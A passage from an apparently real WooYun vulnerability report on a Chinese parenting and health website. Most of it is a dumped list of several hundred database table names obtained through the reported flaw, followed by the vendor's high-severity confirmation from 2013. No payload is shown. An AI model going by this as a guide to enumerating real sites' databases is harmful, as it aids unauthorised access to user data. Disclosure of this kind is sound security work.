| cms_jobs |
| cms_keywords |
| cms_log |
| cms_member |
| cms_member_arctype |
| cms_member_cominfo |
| cms_member_flink |
| cms_member_guestbook |
| cms_member_operation |
| cms_member_perinfo |
| cms_member_time |
| cms_member_type |
| cms_memberstow |
| cms_modules |
| cms_moneycard_record |
| cms_moneycard_type |
| cms_moneyrecord |
| cms_myad |
| cms_mynews |
| cms_mytag |
| cms_orders |
| cms_plus |
| cms_pms |
| cms_score2money_logs |
| cms_scores |
| cms_search_cache |
| cms_search_keywords |
| cms_search_rule |
| cms_sectors |
| cms_sgpage |
| cms_smalltypes |
| cms_softconfig |
| cms_sysconfig |
| cms_syspassport |
| cms_tag_index |
| cms_tag_list |
| cms_task |
| cms_test_courl |
| cms_uploads |
| cms_vote |
| common_survey |
| common_survey_answer |
| cyesis_check_list |
| cyesis_fuh_plot |
| cyesis_maza_sport |
| data |
| data10 |
| dish_orgPic |
| egg_broad |
| egg_egg |
| egg_getchance_log |
| egg_getvalue_log |
| egg_gift |
| egg_smash_log |
| home_edu_ability |
| home_edu_babyclass |
| home_edu_list |
| home_edu_report |
| home_edu_syncplan |
| home_edu_topic |
| home_edu_type |
| home_edu_vaccination_list |
| home_genius_course |
| home_genius_coursefin |
| home_genius_question |
| home_genius_questionres |
| home_isuse |
| home_nutrition_logs |
| home_nutrition_question |
| home_nutrition_subject |
| ju2_TA_BASEINFO |
| ju2_TB_EDURESULT |
| ju2_TB_EDUTEST |
| ju2_access_hits |
| ju2_access_logs |
| ju2_access_logs_2009 |
| ju2_access_logs_2010 |
| ju2_access_logs_2011 |
| ju2_actions |
| ju2_actions_2009 |
| ju2_actions_2010 |
| ju2_actions_2011 |
| ju2_actions_new |
| ju2_actions_set |
| ju2_areacode |
| ju2_ask |
| ju2_askcomment |
| ju2_askreply |
| ju2_babyshow |
| ju2_babyshow_record |
| ju2_bbs_threads |
| ju2_beauty_userimg |
| ju2_beautyimageinfo |
| ju2_beautyimagetype |
| ju2_category |
| ju2_chat |
| ju2_chat_item |
| ju2_cms_cache |
| ju2_comment_info |
| ju2_competition |
| ju2_competition_61_user |
| ju2_competition_award |
| ju2_competition_expert |
| ju2_competition_persons |
| ju2_competition_r_award |
| ju2_competition_r_expert |
| ju2_competition_r_person |
| ju2_competition_setting |
| ju2_competition_vote |
| ju2_competition_writing |
| ju2_competition_writing_comment |
| ju2_competition_writing_order |
| ju2_datadict |
| ju2_datadict_type |
| ju2_dish |
| ju2_dish_food |
| ju2_exchange_contact |
| ju2_exchange_gift |
| ju2_exchange_record |
| ju2_fayu_expert_guide |
| ju2_fayu_hw_standard |
| ju2_fayu_my_record |
| ju2_fayu_standard |
| ju2_fitness_food |
| ju2_fitness_history |
| ju2_fitness_report |
| ju2_fitness_sportplan |
| ju2_food |
| ju2_foodtype |
| ju2_grassstar_items |
| ju2_group_albums |
| ju2_group_comment |
| ju2_group_conttype |
| ju2_group_experttype |
| ju2_group_guestbook |
| ju2_group_media |
| ju2_group_notice |
| ju2_group_phoact |
| ju2_group_phoact_posts_old |
| ju2_group_photo |
| ju2_group_photo_posts |
| ju2_group_posts |
| ju2_group_relate_type |
| ju2_group_sharetype |
| ju2_group_smalltypes |
| ju2_group_spectype |
| ju2_group_store |
| ju2_group_threads |
| ju2_group_threadtype |
| ju2_group_user |
| ju2_groups |
| ju2_gym |
| ju2_interview_comment |
| ju2_interview_file |
| ju2_interview_items |
| ju2_interview_record |
| ju2_interview_threads |
| ju2_logs |
| ju2_mom_temp |
| ju2_mombabytest |
| ju2_music |
| ju2_newfoodinfo |
| ju2_newfoodtype |
| ju2_newsportinfo |
| ju2_newsporttype |
| ju2_normal_article |
| ju2_normal_category |
| ju2_normal_interview |
| ju2_normal_special |
| ju2_play_member |
| ju2_play_msg |
| ju2_plays |
| ju2_playtype |
| ju2_pregnancy_care |
| ju2_reply |
| ju2_sport |
| ju2_sportinfo |
| ju2_sporttype |
| ju2_suggest |
| ju2_survey |
| ju2_survey_options |
| ju2_temp_category |
| ju2_temp_info |
| ju2_test_record |
| ju2_toolslog |
| ju2_turntable_baby |
| ju2_turntable_getbaby |
| ju2_turntable_log |
| ju2_turntable_prize |
| ju2_turntable_prize_user |
| ju2_ucb_arcarticle |
| ju2_ucb_arcarticle_bak |
| ju2_ucb_arctype |
| ju2_ucb_arctype_bak |
| ju2_user_sport |
| ju2_userinfo_baby |
| ju2_userinfo_fitness |
| ju2_userinfo_mom |
| ju2_viewpoint |
| ju2_viewpoint_replys |
| ju2_visit_serv_total |
| ju2_visit_stat |
| ju2_vote |
| ju2_wish_contact |
| ju2_wish_contents |
| ju2_wish_groups |
| ju2_wish_record |
| ju2_wishes |
| ju2_yuerjing_comment |
| ju2_yuerjing_threads |
| ju2_zj_course_record |
| ju2_zj_course_subject |
| ju2_zj_test_category |
| ju2_zj_test_course |
| ju2_zj_test_log |
| ju2_zj_test_standard |
| ju2_zj_test_subject |
| ju2_zj_test_user |
| ju2_zj_test_user_stat |
| kangq_ad_client |
| kangq_ad_cls |
| kangq_ad_column |
| kangq_ad_position |
| kangq_ads |
| kangq_ads_issue |
| kangq_ads_stat |
| kangq_ads_stat_log |
| kangq_ads_stat_mon |
| kangq_darren |
| kangq_darren_category |
| kangq_darren_requisit |
| kangq_keywords |
| kangq_q_countscore |
| kangq_q_question |
| kangq_q_record |
| kangq_survey |
| mjuser |
| mjuser_group |
| mmkt_item_stat |
| mmkt_subject |
| mmkt_subject_item |
| mmkt_user_answer |
| mmkt_user_getsubject |
| mmkt_user_stat |
| mobile_code |
| mobile_cur_record |
| mobile_record |
| mobile_task |
| ncms_article_category |
| ncms_article_items |
| ncms_article_r_category |
| ncms_article_templates |
| ncms_block |
| ncms_block_data |
| ncms_block_data_old |
| ncms_block_list |
| ncms_category |
| ncms_category_list |
| ncms_image_groups |
| ncms_image_items |
| ncms_labels |
| ncms_nour_ques |
| ncms_nour_ques_log |
| ncms_user_stat |
| space_skin |
| sphinx_index |
| statistics_actuser |
| statistics_record1 |
| statistics_record1_channel |
| tbc_coupon |
| tbc_coupon_list |
| tbc_coupon_log |
| tbc_merchant |
| tbc_region |
| tbc_sms |
| tbc_verify |
| tbc_vote_activity |
| tbc_vote_detail |
| tbc_vote_items |
| tbf_experience |
| tbf_report |
| tbf_sensit

修复方案:

你们都懂得~

版权声明:转载请注明来源 adm1n@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-11-26 15:47

厂商回复:

非常感谢

最新状态:

暂无


漏洞评价:

评论